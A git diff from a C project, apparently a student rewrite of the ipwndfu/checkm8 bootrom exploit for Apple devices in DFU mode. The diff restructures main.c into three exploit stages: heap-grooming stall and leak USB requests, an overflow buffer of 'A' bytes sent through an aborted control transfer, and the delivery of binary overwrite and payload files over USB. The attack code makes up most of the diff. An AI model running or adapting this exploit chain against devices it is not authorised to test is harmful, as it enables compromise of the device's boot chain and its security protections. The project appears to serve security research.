diff --git a/.idea/workspace.xml b/.idea/workspace.xml
index d926e77..624c26b 100644
--- a/.idea/workspace.xml
+++ b/.idea/workspace.xml
@@ -3,7 +3,6 @@
   <component name="CMakeRunConfigurationManager" shouldGenerate="true" shouldDeleteObsolete="true">
     <generated>
       <config projectName="ipwndfu_rewrite_c" targetName="ipwndfu" />
-      <config projectName="ipwndfu_rewrite_c" targetName="libusb-1.0_custom" />
     </generated>
   </component>
   <component name="CMakeSettings">
@@ -12,7 +11,12 @@
     </configurations>
   </component>
   <component name="ChangeListManager">
-    <list default="true" id="b2f61e55-9467-486e-b84a-47b98c1101b5" name="Default Changelist" comment="" />
+    <list default="true" id="b2f61e55-9467-486e-b84a-47b98c1101b5" name="Default Changelist" comment="">
+      <change beforePath="$PROJECT_DIR$/.idea/workspace.xml" beforeDir="false" afterPath="$PROJECT_DIR$/.idea/workspace.xml" afterDir="false" />
+      <change beforePath="$PROJECT_DIR$/CMakeLists.txt" beforeDir="false" afterPath="$PROJECT_DIR$/CMakeLists.txt" afterDir="false" />
+      <change beforePath="$PROJECT_DIR$/libusb_helpers.c" beforeDir="false" afterPath="$PROJECT_DIR$/libusb_helpers.c" afterDir="false" />
+      <change beforePath="$PROJECT_DIR$/main.c" beforeDir="false" afterPath="$PROJECT_DIR$/main.c" afterDir="false" />
+    </list>
     <option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true" />
     <option name="SHOW_DIALOG" value="false" />
     <option name="HIGHLIGHT_CONFLICTS" value="true" />
@@ -22,7 +26,6 @@
   <component name="ClangdSettings">
     <option name="formatViaClangd" value="false" />
   </component>
-  <component name="ExecutionTargetManager" SELECTED_TARGET="CMakeBuildProfile:Debug" />
   <component name="Git.Settings">
     <option name="RECENT_GIT_ROOT_PATH" value="$PROJECT_DIR$" />
   </component>
@@ -35,7 +38,7 @@
   <component name="PropertiesComponent">
     <property name="WebServerToolWindowFactoryState" value="false" />
     <property name="last_opened_file_path" value="$PROJECT_DIR$/launch_with_sudo.sh" />
-    <property name="settings.editor.selected.configurable" value="project.propVCSSupport.Mappings" />
+    <property name="settings.editor.selected.configurable" value="settings.github" />
   </component>
   <component name="RunDashboard">
     <option name="ruleStates">
@@ -58,14 +61,8 @@
         <option name="com.jetbrains.cidr.execution.CidrBuildBeforeRunTaskProvider$BuildBeforeRunTask" enabled="true" />
       </method>
     </configuration>
-    <configuration name="libusb-1.0_custom" type="CMakeRunConfiguration" factoryName="Application" PASS_PARENT_ENVS_2="true" PROJECT_NAME="ipwndfu_rewrite_c" TARGET_NAME="libusb-1.0_custom" CONFIG_NAME="Debug">
-      <method v="2">
-        <option name="com.jetbrains.cidr.execution.CidrBuildBeforeRunTaskProvider$BuildBeforeRunTask" enabled="true" />
-      </method>
-    </configuration>
     <list>
       <item itemvalue="CMake Application.ipwndfu" />
-      <item itemvalue="CMake Application.libusb-1.0_custom" />
       <item itemvalue="GDB Remote Debug.ipwndfu_debug_sudo" />
     </list>
   </component>
diff --git a/CMakeLists.txt b/CMakeLists.txt
index 65a5790..bd851fc 100644
--- a/CMakeLists.txt
+++ b/CMakeLists.txt
@@ -4,16 +4,5 @@ project(ipwndfu_rewrite_c C)
 set(CMAKE_C_STANDARD 99)
 set(CMAKE_C_FLAGS -g)
 
-add_library(libusb-1.0_custom
-        libusb/config.h
-
-        libusb/libusb/core.c libusb/libusb/descriptor.c libusb/libusb/hotplug.c
-        libusb/libusb/io.c libusb/libusb/strerror.c libusb/libusb/sync.c
-        libusb/libusb/hotplug.h libusb/libusb/libusb.h libusb/libusb/libusbi.h libusb/libusb/version.h
-
-        libusb/libusb/os/linux_netlink.c libusb/libusb/os/linux_usbfs.c libusb/libusb/os/linux_udev.c
-        libusb/libusb/os/threads_posix.c libusb/libusb/os/poll_posix.c
-        libusb/libusb/os/linux_usbfs.h libusb/libusb/os/threads_posix.h libusb/libusb/os/poll_posix.h)
-
 add_executable(ipwndfu main.c libusb_helpers.c libusb_helpers.h)
-target_link_libraries(ipwndfu libusb-1.0_custom pthread udev)
+target_link_libraries(ipwndfu usb-1.0)
diff --git a/bin/overwrite.bin b/bin/overwrite.bin
new file mode 100644
index 0000000..41becba
Binary files /dev/null and b/bin/overwrite.bin differ
diff --git a/bin/payload.bin b/bin/payload.bin
new file mode 100644
index 0000000..f75b8b4
Binary files /dev/null and b/bin/payload.bin differ
diff --git a/libusb_helpers.c b/libusb_helpers.c
index cfc6cb3..5794b87 100644
--- a/libusb_helpers.c
+++ b/libusb_helpers.c
@@ -20,6 +20,7 @@ void get_test_device(libusb_context *usb_ctx, struct libusb_device_bundle *bundl
         usb_device = usb_device_list[i];
         libusb_get_device_descriptor(usb_device, &usb_desc);
 
+        printf("%i\t%X:%X\n", i, usb_desc.idVendor, usb_desc.idProduct);
         if(usb_desc.idVendor == 0x05AC && usb_desc.idProduct == 0x1227)
         {
             libusb_open(usb_device, &usb_handle);
@@ -45,7 +46,7 @@ void libusb1_async_ctrl_transfer(libusb_device_handle *handle,
     gettimeofday(&start, NULL);
 
     struct libusb_transfer *usb_transfer = libusb_alloc_transfer(0);
-    libusb_fill_control_setup(usb_transfer_buf, bmRequestType, bRequest, wValue, wIndex, 0xC0);
+    libusb_fill_control_setup(usb_transfer_buf, bmRequestType, bRequest, wValue, wIndex, data_len);
     memcpy(&usb_transfer_buf[8], data, data_len);
     libusb_fill_control_transfer(usb_transfer, handle, usb_transfer_buf, NULL, NULL, 1);
 
diff --git a/main.c b/main.c
index 971e8d1..69abeec 100644
--- a/main.c
+++ b/main.c
@@ -5,60 +5,19 @@
 
 #include "libusb_helpers.h"
 
-int main()
+int complete_stage(int stage_function(libusb_device_handle *handle))
 {
     int ret;
-    libusb_context *usb_ctx = NULL;
-    libusb_init(&usb_ctx);
-
-    struct libusb_device_bundle usb_bundle;
-    get_test_device(usb_ctx, &usb_bundle);
-
-    if(usb_bundle.handle == NULL)
-    {
-        libusb_exit(usb_ctx);
-        printf("Could not find device\n");
-        return 1;
-    }
-
-    struct libusb_device_handle *usb_handle = usb_bundle.handle;
-    struct libusb_device_descriptor usb_desc = usb_bundle.descriptor;
-
-    ret = libusb_set_auto_detach_kernel_driver(usb_handle, 1);
-    if(ret > 0)
-    {
-        printf("%s\n", libusb_error_name(ret));
-        exit(1);
-    }
-
     unsigned char usb_serial_buf[128];
-    unsigned char usb_data_buf[2048];
-    unsigned char usb_transfer_buf[2048];
 
-    libusb_get_string_descriptor_ascii(usb_handle, usb_desc.iSerialNumber, usb_serial_buf, sizeof(usb_serial_buf));
-    printf("Found device with serial %s\n", usb_serial_buf);
+    libusb_context *usb_ctx = NULL;
+    struct libusb_device_bundle usb_bundle;
+    struct libusb_device_handle *usb_handle;
+    struct libusb_device_descriptor usb_desc;
 
-    // begin the USB magic section
-    unsigned int i;
-
-    stall(usb_handle);
-    for(i = 0; i < 5; i++)
-    {
-        no_leak(usb_handle);
-    }
-    usb_req_leak(usb_handle);
-    no_leak(usb_handle);
-
-    libusb_reset_device(usb_handle);
-
-    libusb_close(usb_handle);
-    libusb_exit(usb_ctx);
-
-    usb_bundle.handle = NULL;
-
-    // section 2
     libusb_init(&usb_ctx);
     get_test_device(usb_ctx, &usb_bundle);
+
     if(usb_bundle.handle == NULL)
     {
         libusb_exit(usb_ctx);
@@ -69,5 +28,100 @@ int main()
     usb_handle = usb_bundle.handle;
     usb_desc = usb_bundle.descriptor;
 
+    libusb_get_string_descriptor_ascii(usb_handle, usb_desc.iSerialNumber, usb_serial_buf, sizeof(usb_serial_buf));
+    printf("Found device with serial %s\n", usb_serial_buf);
+
+    ret = libusb_set_auto_detach_kernel_driver(usb_handle, 1);
+    if(ret > 0)
+    {
+        printf("%s\n", libusb_error_name(ret));
+        return ret;
+    }
+
+    ret = stage_function(usb_handle);
+
+    libusb_close(usb_handle);
+    libusb_exit(usb_ctx);
+    return ret;
+}
+
+int stage1_function(libusb_device_handle *handle)
+{
+    printf("~~~ Stage 1 ~~~\n");
+    unsigned int i;
+
+    stall(handle);
+    for(i = 0; i < 5; i++)
+    {
+        no_leak(handle);
+    }
+    usb_req_leak(handle);
+    no_leak(handle);
+
+    libusb_reset_device(handle);
+
     return 0;
+}
+
+int stage2_function(libusb_device_handle *handle)
+{
+    printf("~~~ Stage 2 ~~~\n");
+    unsigned char databuf[0x800];
+    memset(databuf, 'A', 0x800);
+
+    libusb1_async_ctrl_transfer(handle, 0x21, 1, 0, 0, databuf, 0x800, 1);
+    libusb1_no_error_ctrl_transfer(handle, 0x21, 4, 0, 0, NULL, 0, 0);
+
+    libusb_reset_device(handle);
+
+    return 0;
+}
+
+int stage3_function(libusb_device_handle *handle)
+{
+    printf("~~~ Stage 3 ~~~\n");
+
+    unsigned char overwrite_buf[1524];
+    FILE *overwrite_file = fopen("/home/grg/Projects/School/NCSU/iphone_aes_sc/ipwndfu_rewrite_c/bin/overwrite.bin", "r");
+    fread(overwrite_buf, 1524, 1, overwrite_file);
+    fclose(overwrite_file);
+
+    unsigned char payload_buf[2400];
+    FILE *payload_file = fopen("/home/grg/Projects/School/NCSU/iphone_aes_sc/ipwndfu_rewrite_c/bin/payload.bin", "r");
+    fread(payload_buf, 2400, 1, payload_file);
+    fclose(payload_file);
+
+    usb_req_stall(handle);
+    usb_req_leak(handle);
+
+    libusb1_no_error_ctrl_transfer(handle, 0, 0, 0, 0, overwrite_buf, 1524, 100);
+    libusb1_no_error_ctrl_transfer(handle, 0x21, 1, 0, 0, payload_buf, 2048, 100);
+    libusb1_no_error_ctrl_transfer(handle, 0x21, 1, 0, 0, &payload_buf[2048], 352, 100);
+
+    libusb_reset_device(handle);
+    return 0;
+}
+
+int check_function(libusb_device_handle *handle)
+{
+    return 0;
+}
+
+int main()
+{
+    int ret = complete_stage(stage1_function);
+    if(ret == 0)
+    {
+        ret = complete_stage(stage2_function);
+    }
+
+    usleep(2000);
+
+    if(ret == 0)
+    {
+        ret = complete_stage(stage3_function);
+    }
+
+    complete_stage(check_function);
+    return ret;
 }
\ No newline at end of file
